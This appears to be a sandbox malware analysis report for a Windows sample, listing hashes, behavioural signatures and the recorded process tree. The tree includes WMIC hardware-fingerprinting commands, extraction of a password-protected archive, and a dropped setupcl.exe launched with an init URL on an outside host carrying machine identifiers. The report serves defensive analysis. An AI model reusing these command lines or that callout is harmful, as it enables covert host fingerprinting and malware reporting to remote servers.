Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-09-2024 23:02
Static task
static1
Behavioral task
behavioral1
Sample
e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/7za.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/7za.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240802-en
General
-
Target
e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe
-
Size
406KB
-
MD5
e7ddb613fc9645ca54248e898f3cd759
-
SHA1
3093a8b0775f33cbfb9b76b3239c9d71d35d71d3
-
SHA256
241ce93b6c6b7c5574febef670b247f10a14bcd7e24b3944899b00f2c0ef7f49
-
SHA512
3543fcaaf9914c015a03744e13cd2313900b17b3234bdad6856279305bb33212952f27c8e9c1f5cb7967265d659adf5a0f1d652181098e0aeae73f12408ed3e0
-
SSDEEP
12288:fA0i50GXQDsm9Gx28mIHRXmx+fUXK9W4kMepNnHbh:fAfyGgNCmIHR2IMakPpNnHbh
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
7za.exesetupcl.exepid process 2212 7za.exe 2612 setupcl.exe -
Loads dropped DLL 8 IoCs
Processes:
e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exepid process 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
setupcl.exewmic.exee7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exe7za.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setupcl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7za.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WMIC.exeWMIC.exedescription pid process Token: SeIncreaseQuotaPrivilege 2092 WMIC.exe Token: SeSecurityPrivilege 2092 WMIC.exe Token: SeTakeOwnershipPrivilege 2092 WMIC.exe Token: SeLoadDriverPrivilege 2092 WMIC.exe Token: SeSystemProfilePrivilege 2092 WMIC.exe Token: SeSystemtimePrivilege 2092 WMIC.exe Token: SeProfSingleProcessPrivilege 2092 WMIC.exe Token: SeIncBasePriorityPrivilege 2092 WMIC.exe Token: SeCreatePagefilePrivilege 2092 WMIC.exe Token: SeBackupPrivilege 2092 WMIC.exe Token: SeRestorePrivilege 2092 WMIC.exe Token: SeShutdownPrivilege 2092 WMIC.exe Token: SeDebugPrivilege 2092 WMIC.exe Token: SeSystemEnvironmentPrivilege 2092 WMIC.exe Token: SeRemoteShutdownPrivilege 2092 WMIC.exe Token: SeUndockPrivilege 2092 WMIC.exe Token: SeManageVolumePrivilege 2092 WMIC.exe Token: 33 2092 WMIC.exe Token: 34 2092 WMIC.exe Token: 35 2092 WMIC.exe Token: SeIncreaseQuotaPrivilege 2092 WMIC.exe Token: SeSecurityPrivilege 2092 WMIC.exe Token: SeTakeOwnershipPrivilege 2092 WMIC.exe Token: SeLoadDriverPrivilege 2092 WMIC.exe Token: SeSystemProfilePrivilege 2092 WMIC.exe Token: SeSystemtimePrivilege 2092 WMIC.exe Token: SeProfSingleProcessPrivilege 2092 WMIC.exe Token: SeIncBasePriorityPrivilege 2092 WMIC.exe Token: SeCreatePagefilePrivilege 2092 WMIC.exe Token: SeBackupPrivilege 2092 WMIC.exe Token: SeRestorePrivilege 2092 WMIC.exe Token: SeShutdownPrivilege 2092 WMIC.exe Token: SeDebugPrivilege 2092 WMIC.exe Token: SeSystemEnvironmentPrivilege 2092 WMIC.exe Token: SeRemoteShutdownPrivilege 2092 WMIC.exe Token: SeUndockPrivilege 2092 WMIC.exe Token: SeManageVolumePrivilege 2092 WMIC.exe Token: 33 2092 WMIC.exe Token: 34 2092 WMIC.exe Token: 35 2092 WMIC.exe Token: SeIncreaseQuotaPrivilege 2408 WMIC.exe Token: SeSecurityPrivilege 2408 WMIC.exe Token: SeTakeOwnershipPrivilege 2408 WMIC.exe Token: SeLoadDriverPrivilege 2408 WMIC.exe Token: SeSystemProfilePrivilege 2408 WMIC.exe Token: SeSystemtimePrivilege 2408 WMIC.exe Token: SeProfSingleProcessPrivilege 2408 WMIC.exe Token: SeIncBasePriorityPrivilege 2408 WMIC.exe Token: SeCreatePagefilePrivilege 2408 WMIC.exe Token: SeBackupPrivilege 2408 WMIC.exe Token: SeRestorePrivilege 2408 WMIC.exe Token: SeShutdownPrivilege 2408 WMIC.exe Token: SeDebugPrivilege 2408 WMIC.exe Token: SeSystemEnvironmentPrivilege 2408 WMIC.exe Token: SeRemoteShutdownPrivilege 2408 WMIC.exe Token: SeUndockPrivilege 2408 WMIC.exe Token: SeManageVolumePrivilege 2408 WMIC.exe Token: 33 2408 WMIC.exe Token: 34 2408 WMIC.exe Token: 35 2408 WMIC.exe Token: SeIncreaseQuotaPrivilege 2408 WMIC.exe Token: SeSecurityPrivilege 2408 WMIC.exe Token: SeTakeOwnershipPrivilege 2408 WMIC.exe Token: SeLoadDriverPrivilege 2408 WMIC.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
setupcl.exepid process 2612 setupcl.exe 2612 setupcl.exe -
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exesetupcl.exedescription pid process target process PID 2524 wrote to memory of 2092 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe WMIC.exe PID 2524 wrote to memory of 2092 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe WMIC.exe PID 2524 wrote to memory of 2092 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe WMIC.exe PID 2524 wrote to memory of 2092 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe WMIC.exe PID 2524 wrote to memory of 2408 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe WMIC.exe PID 2524 wrote to memory of 2408 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe WMIC.exe PID 2524 wrote to memory of 2408 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe WMIC.exe PID 2524 wrote to memory of 2408 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe WMIC.exe PID 2524 wrote to memory of 2800 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe WMIC.exe PID 2524 wrote to memory of 2800 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe WMIC.exe PID 2524 wrote to memory of 2800 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe WMIC.exe PID 2524 wrote to memory of 2800 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe WMIC.exe PID 2524 wrote to memory of 2808 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe WMIC.exe PID 2524 wrote to memory of 2808 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe WMIC.exe PID 2524 wrote to memory of 2808 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe WMIC.exe PID 2524 wrote to memory of 2808 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe WMIC.exe PID 2524 wrote to memory of 2212 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe 7za.exe PID 2524 wrote to memory of 2212 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe 7za.exe PID 2524 wrote to memory of 2212 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe 7za.exe PID 2524 wrote to memory of 2212 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe 7za.exe PID 2524 wrote to memory of 2612 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe setupcl.exe PID 2524 wrote to memory of 2612 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe setupcl.exe PID 2524 wrote to memory of 2612 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe setupcl.exe PID 2524 wrote to memory of 2612 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe setupcl.exe PID 2524 wrote to memory of 2612 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe setupcl.exe PID 2524 wrote to memory of 2612 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe setupcl.exe PID 2524 wrote to memory of 2612 2524 e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe setupcl.exe PID 2612 wrote to memory of 2132 2612 setupcl.exe wmic.exe PID 2612 wrote to memory of 2132 2612 setupcl.exe wmic.exe PID 2612 wrote to memory of 2132 2612 setupcl.exe wmic.exe PID 2612 wrote to memory of 2132 2612 setupcl.exe wmic.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC csproduct Get UUID /FORMAT:textvaluelist.xsl2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC bios Get Version /FORMAT:textvaluelist.xsl2⤵
- System Location Discovery: System Language Discovery
PID:2800
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC csproduct Get Name /FORMAT:textvaluelist.xsl2⤵
- System Location Discovery: System Language Discovery
PID:2808
-
-
C:\Users\Admin\AppData\Local\Temp\nsoD26E.tmp\7za.exe7za.exe e -y -p"29e9ddc5056cb3b8ac5589a6ec27dd0b" [RANDOM_STRING].7z2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2212
-
-
C:\Users\Admin\AppData\Local\Temp\nsoD26E.tmp\setupcl.exe"C:\Users\Admin\AppData\Local\Temp\nsoD26E.tmp\setupcl.exe" /initurl http://sub.mascie.com/init/e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118/:uid:? /affid "-" /id "0" /name " " /uniqid e7ddb613fc9645ca54248e898f3cd759_JaffaCakes118 /uuid stance(s) Available. /biosserial /biosversion BOCHS - 1 /csname stance(s) Available.2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic bios get serialnumber, version3⤵
- System Location Discovery: System Language Discovery
PID:2132
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
80KB
MD50bab4ffc3b2cf3b4a1837f7c52bcbf1e
SHA180ddc8db8ad07f4fec396cbb980eeba0390bdeec
SHA256150040eda04bc1d432fd3dbb1b4aa6cf41e40cda985ecfe4de086fd8f50c294a
SHA5128d98f3c39b558e339d6547cbc54d608cd759e9e081319b05069f0c846aa673b12f169d4d163a848ced9d9afaafc4a4fc6a1a197d7baaa2f7c9272bdf3c194b35
-
Filesize
574KB
MD542badc1d2f03a8b1e4875740d3d49336
SHA1cee178da1fb05f99af7a3547093122893bd1eb46
SHA256c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf
SHA5126bc519a7368ee6bd8c8f69f2d634dd18799b4ca31fbc284d2580ba625f3a88b6a52d2bc17bea0e75e63ca11c10356c47ee00c2c500294abcb5141424fc5dc71c
-
Filesize
8KB
MD5b8be6632a7dc8136ff01338be40fe701
SHA1043fa16929b2af5ed5c1c59b4035a10cf765fb43
SHA256289786fe13801467653eb2712f47f162d6fd3fc2d844be342282f75fc2b2a085
SHA512403474154ff8500e5aae2b4466c652e5d066af2c55d8f158e6f007492ceb1f3abcc6cca80842b90900db02db4258ddcda75dec1d1799af24969c35811891e5b8
-
Filesize
193KB
MD510bd2af1b07ec6bc9cd17ba512569e59
SHA1807e17ab1b98177e135d30941b45081960d1e866
SHA2569c620ef6eac3d0d9d3f6f2622a53d1f543cebd93846636ba397683962c07fc7c
SHA512deacd041f12b6ec74f9e4488874ce962037990ed0ae424aaeabf2c35876b2ebbb943f92e9a4ffe504718bb00021209b035439ea4d7c64a4031b86ce9104ce3ed